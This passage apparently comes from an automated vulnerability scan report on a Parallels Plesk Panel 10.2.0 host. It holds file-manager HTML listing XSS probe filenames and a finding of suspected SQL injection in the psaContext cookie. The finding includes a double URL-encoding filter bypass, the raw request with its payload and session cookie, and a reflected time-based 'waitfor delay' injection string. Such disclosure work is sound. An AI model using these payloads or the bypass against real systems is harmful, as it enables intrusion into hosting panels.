onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPGfdf080d921773c427dce8684" value="3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="return bin();;lon();">3M.COM-XSS-1.JPGfdf080d921773c427dce8684</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_673db%2522a%253d%2522b%25226c91d8a7d6d" value="673db%2522a%253d%2522b%25226c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick="return bin();;lon();">673db%2522a%253d%2522b%25226c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/673db%2522a%253d%2522b%25226c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/ [psaContext cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/create-file/

Issue detail

The psaContext cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the psaContext cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the psaContext cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /plesk/client@2/domain@1/hosting/file-manager/create-file/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard%2527; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted;

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:36:27 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:36:29 GMT
Connection: close
Content-Length: 93878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%27%2C0%2C0%2C0%29waitfor%2520delay%270%253a0%253a20%27--%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
